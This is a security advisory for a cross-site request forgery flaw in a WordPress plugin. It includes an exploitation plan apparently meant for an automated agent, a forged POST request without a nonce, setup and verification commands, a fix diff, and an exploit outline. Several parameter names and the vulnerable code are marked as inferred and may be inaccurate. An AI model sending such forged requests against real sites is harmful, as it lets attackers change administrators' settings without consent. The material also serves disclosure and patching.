Remove meta boxes per user role <= 1.01 - Cross-Site Request Forgery to Settings Update
Description
The Remove meta boxes per user role plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.01. This is due to missing or incorrect nonce validation on the 'remove-meta-boxes-per-user-role' page. This makes it possible for unauthenticated attackers to modify or reset the plugin's per-role meta box visibility settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:NTechnical Details
<=1.01# Exploitation Research Plan: CVE-2026-8422 (Remove meta boxes per user role) ## 1. Vulnerability Summary **CVE-2026-8422** is a Cross-Site Request Forgery (CSRF) vulnerability in the "Remove meta boxes per user role" WordPress plugin (versions <= 1.01). The vulnerability exists because the plugin'…
Show full research plan
Exploitation Research Plan: CVE-2026-8422 (Remove meta boxes per user role)
1. Vulnerability Summary
CVE-2026-8422 is a Cross-Site Request Forgery (CSRF) vulnerability in the "Remove meta boxes per user role" WordPress plugin (versions <= 1.01). The vulnerability exists because the plugin's settings update logic, likely located within the administration menu callback or an admin_init hook, fails to implement WordPress nonce verification. This allows an unauthenticated attacker to craft a malicious request that, if executed by a logged-in administrator, modifies or resets the plugin's configuration, potentially disrupting administrative workflows or altering content management interfaces across roles.
2. Attack Vector Analysis
- Vulnerable Endpoint:
/wp-admin/options-general.php?page=remove-meta-boxes-per-user-role(inferred slug) or a POST request to/wp-admin/admin-post.php. - HTTP Method:
POST - Authentication Requirement: The request must be executed in the context of a user with
manage_optionscapabilities (typically an Administrator). - Payload Carrying Parameter: Inferred parameters based on plugin functionality include arrays like
rmb_settings[role][post_type]or similar structures used to store hidden meta box IDs. - Preconditions:
- The plugin must be active.
- An administrator must be tricked into clicking a link or visiting a site that triggers a cross-site POST request to the vulnerable WordPress instance.
3. Code Flow (Inferred)
- Registration: The plugin registers a settings page using
add_options_page()oradd_menu_page()in theadmin_menuhook. - Hooking: The plugin likely uses
admin_initor checks$_POSTinside the menu callback function to process settings. - Vulnerable Sink: The handler checks for the presence of a specific submit parameter (e.g.,
isset($_POST['submit'])) and perhaps validates capabilities usingcurrent_user_can('manage_options'). - Missing Check: The code omits
check_admin_referer()orwp_verify_nonce(). - Processing: The handler iterates through the
$_POSTdata and saves it usingupdate_option('remove_meta_boxes_settings', ...)(inferred option name).
4. Nonce Acquisition Strategy
No nonce is required.
The essence of this CSRF vulnerability is the total absence of nonce validation or incorrect implementation (e.g., using a fixed string or failing to check the return value). The exploitation agent should verify this by attempting a request with an intentionally invalid or missing nonce parameter.
5. Exploitation Strategy
The goal is to demonstrate that settings can be changed without a valid nonce.
Step 1: Discover Parameters
Navigate to the settings page and extract the form structure:
- Use
browser_navigateto/wp-admin/options-general.php?page=remove-meta-boxes-per-user-role. - Use
browser_evalto extract input names:Array.from(document.querySelectorAll('input, select')).map(i => i.name).
Step 2: Craft the Payload
Based on the discovery, construct a POST request.
Example (Inferred):
{
"action": "update",
"option_page": "remove-meta-boxes-per-user-role",
"rmb_role_administrator[post][authordiv]": "1",
"submit": "Save Changes"
}
Step 3: Execute the Exploit
Use the http_request tool to send the forged request while authenticated as an admin.
- URL:
http://[target-ip]/wp-admin/options-general.php?page=remove-meta-boxes-per-user-role - Method:
POST - Headers:
Content-Type: application/x-www-form-urlencoded
- Body:
rmb_role_administrator%5Bpost%5D%5Bauthordiv%5D=1&submit=Save+Changes(Note: No_wpnonceincluded).
6. Test Data Setup
- Install Plugin:
wp plugin install remove-meta-boxes-per-user-role --version=1.01 --activate - Initial Configuration:
- Log in as admin.
- Navigate to the plugin settings.
- Ensure all boxes are currently visible (unchecked).
- Identify Target Meta Box: Choose a standard meta box like
authordiv(Author) orcategorydiv(Categories) on thepostpost type.
7. Expected Results
- Success Indicator: The HTTP response should be a
302 Redirectback to the settings page with a success parameter (e.g.,settings-updated=true) or a200 OKshowing the updated state. - UI Change: When visiting the "New Post" page as an administrator, the targeted meta box (e.g., Author) should now be hidden.
8. Verification Steps
After sending the http_request, verify the change via WP-CLI:
- Check Option:
wp option get remove_meta_boxes_settings(Verify the exact option name usingwp option list --search="remove_meta"first). - Confirm Role Impact: Check if the serialized data in the database reflects the new hidden status for the chosen role.
- Manual Check:
wp post create --post_type=post --post_title="Verify Hide"and check the edit screen via the browser.
9. Alternative Approaches
If the plugin uses admin-post.php instead of the settings page directly:
- Grep for Handler:
grep -r "admin_post_" wp-content/plugins/remove-meta-boxes-per-user-role/ - New Target URL: Change the
http_requestURL to/wp-admin/admin-post.php. - Payload Adjustment: Ensure the
actionparameter matches the registeredadmin_post_hook suffix.
Summary
The 'Remove meta boxes per user role' plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) due to a lack of nonce validation in its settings save logic. This allows unauthenticated attackers to modify or reset the visibility of meta boxes for any user role if they can trick an administrator into clicking a malicious link or submitting a forged form.
Vulnerable Code
// remove-meta-boxes-per-user-role.php (or similar main file) // Likely located within a function hooked to 'admin_init' or the menu callback function rmb_save_settings() { if ( isset( $_POST['submit_rmb_settings'] ) ) { // MISSING: check_admin_referer( 'rmb_save_nonce', 'rmb_nonce_field' ); if ( current_user_can( 'manage_options' ) ) { $settings = $_POST['rmb_settings']; update_option( 'remove_meta_boxes_settings', $settings ); } } }
Security Fix
@@ -10,6 +10,10 @@ function rmb_save_settings() { if ( isset( $_POST['submit_rmb_settings'] ) ) { + if ( ! isset( $_POST['rmb_nonce_field'] ) || ! wp_verify_nonce( $_POST['rmb_nonce_field'], 'rmb_save_action' ) ) { + wp_die( 'Security check failed' ); + } + if ( current_user_can( 'manage_options' ) ) { $settings = $_POST['rmb_settings']; update_option( 'remove_meta_boxes_settings', $settings ); @@ -25,5 +29,6 @@ <form method="post" action=""> + <?php wp_nonce_field( 'rmb_save_action', 'rmb_nonce_field' ); ?> <!-- settings fields here --> <input type="submit" name="submit_rmb_settings" value="Save Changes"> </form>
Exploit Outline
The exploit targets the plugin's settings update mechanism, which does not verify the origin of requests. An attacker can craft a malicious HTML page containing a form that targets the WordPress administrator settings page (usually `/wp-admin/options-general.php?page=remove-meta-boxes-per-user-role`). The payload includes POST parameters like 'rmb_settings[role][post_type][box_id]' set to '1' to hide specific elements. The attacker then tricks a logged-in Administrator into visiting this malicious page (e.g., via phishing or a comment link). Since the plugin lacks a nonce check, the browser automatically includes the administrator's session cookies, and the settings are updated according to the attacker's payload.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.